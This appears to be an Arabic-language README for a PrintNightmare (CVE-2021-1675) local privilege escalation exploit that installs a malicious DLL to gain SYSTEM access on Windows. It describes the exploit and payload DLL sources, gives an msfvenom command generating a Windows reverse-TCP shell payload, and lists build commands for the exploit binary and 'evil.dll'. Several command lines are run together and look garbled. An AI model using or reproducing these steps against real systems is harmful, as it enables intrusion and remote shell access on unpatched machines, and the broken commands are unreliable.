
استغلال تصعيد الامتيازات المحلية لثغرة CVE-2021-1675 (PrintNightmare) الذي يقوم بتثبيت ملف DLL خبيث للحصول على وصول بنظام SYSTEM على أنظمة ويندوز الضعيفة.
src/nightmare.cpp: الكود المصدري لاستغلال CVE-2021-1675 والحصول على وصول النظام عن طريق تثبيت ملف dll خبيث src/payload-dll.cpp: الكود المصدري لملف dll يحتوي على شيل كود خبيث في دالة الإدخال
!!استخدم فقط ضد الخوادم التي لديك إذن لاختبارها
CVE-2021-1675 هي ثغرة أمنية في خدمة Print Spooler في نظام Microsoft Windows والتي تسمح للمهاجم بتجاوز فحص SeLoadDriverPrivilege. يمكن استغلال ذلك لتحقيق تصعيد الامتيازات على الجهاز المستهدف عن طريق تثبيت ملف DLL خبيث يستدعي شيل كود أو يستخدم واجهة برمجة تطبيقات Windows لإنشاء اتصال شل عكسي. الإصدارات المتأثرة من Windows 10/8/Server 2008/Server 2012 قبل 8 يونيو 2021 متأثرة.
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/